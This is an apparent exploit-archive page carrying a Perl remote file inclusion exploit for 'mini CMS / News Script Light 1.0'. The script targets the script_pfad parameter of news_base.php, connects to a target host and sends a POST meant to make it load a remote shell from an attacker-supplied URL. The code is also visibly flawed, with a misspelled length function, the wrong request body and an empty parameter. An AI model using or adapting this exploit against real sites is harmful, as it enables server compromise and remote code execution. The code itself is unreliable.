扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 |
#!/usr/bin/perl #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # mini CMS / News Script Light 1.0 Remote File Include Exploit # # Bug found and exploit written by bd0rk || SOH-Crew # # Vendor: http://www.hinnendahl.com/ # # Downloadsite: http://www.hinnendahl.com/index.php?seite=download # # Description: The script_pfad parameter in news_base.php isn't declared before require # # Contact: bd0rk[at]hackermail.com # Website: www.soh-crew.it.tt #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ use Getopt::Long; use URI::Escape; use IO::Socket; $shellcode = "http://yourshellsite.com"; main(); sub usage { print "\mini CMS / News Script Lite 1.0 Remote File Include Exploit\n"; print "Bug found and Exploit written by bd0rk\n"; print "-1, --target\ttarget\t(yourhost.com)\n"; print "-2, --shellpath\tshell\t(http://yourshellsite.com)\n"; print "-3, --dir\tDirectory\t(/news_system)\n"; exit; } sub main { GetOptions ('1|target=s' => \$target, '2|shellpath=s' => \$shellpath,'3|dir=s' => \$dir); usage() unless $target; $shellcode = $shellpath unless !$shellpath; $targethost = uri_escape($shellcode); $socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$target",PeerPort=>"80") or die "\nConnection() Failed.\n"; print "\nConnected to ".$target.", Attacking host...\n"; $bd0rk = "inst=true&ins_file=".$target.""; $soh = lenght($bd0rk); print $socket "POST ".$dir."/news_system/news_base.php?script_pfad= HTTP/1.1\n"; print $socket "Target: ".$target."\n"; print $socket "Connection: close\n"; print $socket "Content-Type: application/x-www-form-urlencoded\n"; print $socket "Content-Lenght: ".$soh."\n\n"; print $socket $soh; print "Server-Response:\n\n"; { print " ".$recvd.""; } exit; } |
体验盒子
